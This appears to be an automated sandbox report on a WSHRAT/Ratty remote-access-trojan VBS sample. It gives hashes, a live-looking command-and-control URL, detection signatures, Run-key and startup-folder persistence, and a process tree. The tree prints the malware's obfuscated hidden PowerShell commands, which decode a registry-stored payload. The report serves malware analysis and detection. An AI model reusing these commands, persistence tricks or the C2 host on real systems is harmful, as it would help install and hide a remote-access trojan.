Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 24-05-2022 22:18

Static task: static1
Behavioral task: behavioral1
Sample: 04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs
Resource: win7-20220414-en
General
- Target: 04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs
- Size: 375KB
- MD5: 03a7ae43aaf89ff7e1764d216c90f22e
- SHA1: fe638120295e1d35073973caf825b0996350ce76
- SHA256: 04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc
- SHA512: d8a89b30cf8314d37c4667811436697c5ad2afa94a01d0eb49819ee49dca2dd3452e24380b155267b7690ba91385c54812ed8ba59021addbaf5502fe53db7ac1

Malware Config
Extracted
- wshrat
- http://pluginsrv2.duckdns.org:8899
Signatures
- Ratty Rat Payload (1 IoC)
  resource: C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
  yara_rule: family_ratty
- suricata: ET MALWARE WSHRAT CnC Checkin
- suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1
- Blocklisted process makes network request (19 IoCs)
  Processes (flow / pid / process): flows 4, 6, 7, 9, 10, 11, 13, 14, 15, 17, 18, 19, 21, 22, 23, 25, 26, 27 and 29, all from pid 1732 WScript.exe
- Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs (WScript.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBajdBaxwJ.vbs (WScript.exe)
- Adds Run key to start application (2 TTPs, 6 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run (WScript.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" (WScript.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\software\microsoft\windows\currentversion\run (WScript.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\"" (WScript.exe)
  Key created: \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run (WScript.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JBajdBaxwJ = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\JBajdBaxwJ.vbs\"" (WScript.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 1076 powershell.exe
  pid 1716 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 1076 powershell.exe
  Token: SeDebugPrivilege, pid 1716 powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs; each pair below is reported three times)
  PID 1648 WScript.exe wrote to memory of 1076 powershell.exe
  PID 1648 WScript.exe wrote to memory of 1732 WScript.exe
  PID 1648 WScript.exe wrote to memory of 1796 cmd.exe
  PID 1796 cmd.exe wrote to memory of 580 javaw.exe
  PID 1648 WScript.exe wrote to memory of 1884 javaw.exe
  PID 1732 WScript.exe wrote to memory of 1716 powershell.exe
Processes
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\04cddb4f63ec0f578e61ab4424180f54a5a960040b618d87c27815c4a4bcebcc.vbs"
  PID: 1648
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','m');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
    PID: 1076
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbs"
    PID: 1732
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$deleBravo = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$deleBravo=$deleBravo.replace('%&','A');$Abt = [Convert]::FromBase64String($deleBravo);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
      PID: 1716
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
    PID: 1796
    - Suspicious use of WriteProcessMemory
    - C:\Program Files\Java\jre7\bin\javaw.exe
      "C:\Program Files\Java\jre7\bin\javaw.exe" -version
      PID: 580
  - C:\Program Files\Java\jre7\bin\javaw.exe
    "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
    PID: 1884
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\output.txt
  Filesize: 144B
  MD5: 9891012748a9c21c96f7787f0a9bf750
  SHA1: 097a201687c23a42c309ef864bbddcfa6bd42a1c
  SHA256: bdf666fbb9293ac2f346e73bbd85d2fd92fde9595773d450cb41cb0c943ab977
  SHA512: 196d1562d8f400799bdb698a66fe4d1ec688f3f35d3986d8e3b78952d6025d2ba048218626ccf5547b9195b39987d7ec41f44424e377865c11245d5447f29671
- C:\Users\Admin\AppData\Roaming\JBajdBaxwJ.vbs
  Filesize: 38KB
  MD5: 2040b52f012cebd59d5aede0556b6636
  SHA1: 2acbfc90f0cffdc6332f1747474e120c25c836e9
  SHA256: d9d8d699a6e5d05328741dd6e4b9133e5bbaf1b73b8e548069dcb4dce0cf8fee
  SHA512: ea594a4d76f231add4989a32ae9c354d933c049bfb94ed05ced4b7879a9fe12ae02fdac53ce9d615de99f1d61c83500bb306178689e32fe8380ffa8f9ba2b742
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: d562431dfee03f4536d8233c9467eb4e
  SHA1: 43163c45f0a27fb44847387a16da461da38eebb8
  SHA256: 2f4b71c88cc717523825ad9ff1a0e2f9ea37afec15518bba2cd37896d558eeea
  SHA512: 043134a0fc1ee477947dae7754fdb89f57e11046c450be19c012938f60a40f8eec245c16f54c5820bb6dc38287194c1f686239a9d4369a9c78bc88f7bf7a9811
- C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
  Filesize: 155KB
  MD5: e4bb4db10f10224e8a633c93573ab288
  SHA1: c5acb8bfa1f113fc11bc1cb487c6eec8268b04cc
  SHA256: cd5820b5eb588435524d0044d1a3324c84ed9cce9791fe957fea223fb5c82bb6
  SHA512: 1be27513a99afe955a37b8c373558317af6461989072df782e3c32315e72a70a0f0e9d8a9b7b0f67fd0cd4a4765589cb82069c65b1d772745ae2a392dcfc5abb
- memory/580-65-0x0000000000000000-mapping.dmp
- memory/1076-59-0x000000001B760000-0x000000001BA5F000-memory.dmp (Filesize: 3.0MB)
- memory/1076-57-0x000007FEF3370000-0x000007FEF3D93000-memory.dmp (Filesize: 10.1MB)
- memory/1076-55-0x0000000000000000-mapping.dmp
- memory/1076-61-0x000000000257B000-0x000000000259A000-memory.dmp (Filesize: 124KB)
- memory/1076-60-0x0000000002574000-0x0000000002577000-memory.dmp (Filesize: 12KB)
- memory/1076-58-0x000007FEF2810000-0x000007FEF336D000-memory.dmp (Filesize: 11.4MB)
- memory/1648-54-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmp (Filesize: 8KB)
- memory/1716-91-0x0000000000000000-mapping.dmp
- memory/1716-95-0x000007FEF3D10000-0x000007FEF4733000-memory.dmp (Filesize: 10.1MB)
- memory/1716-96-0x000007FEF31B0000-0x000007FEF3D0D000-memory.dmp (Filesize: 11.4MB)
- memory/1716-97-0x00000000024F4000-0x00000000024F7000-memory.dmp (Filesize: 12KB)
- memory/1716-98-0x000000001B890000-0x000000001BB8F000-memory.dmp (Filesize: 3.0MB)
- memory/1716-99-0x00000000024FB000-0x000000000251A000-memory.dmp (Filesize: 124KB)
- memory/1732-62-0x0000000000000000-mapping.dmp
- memory/1796-63-0x0000000000000000-mapping.dmp
- memory/1884-78-0x0000000000000000-mapping.dmp
- memory/1884-92-0x0000000002310000-0x0000000005310000-memory.dmp (Filesize: 48.0MB)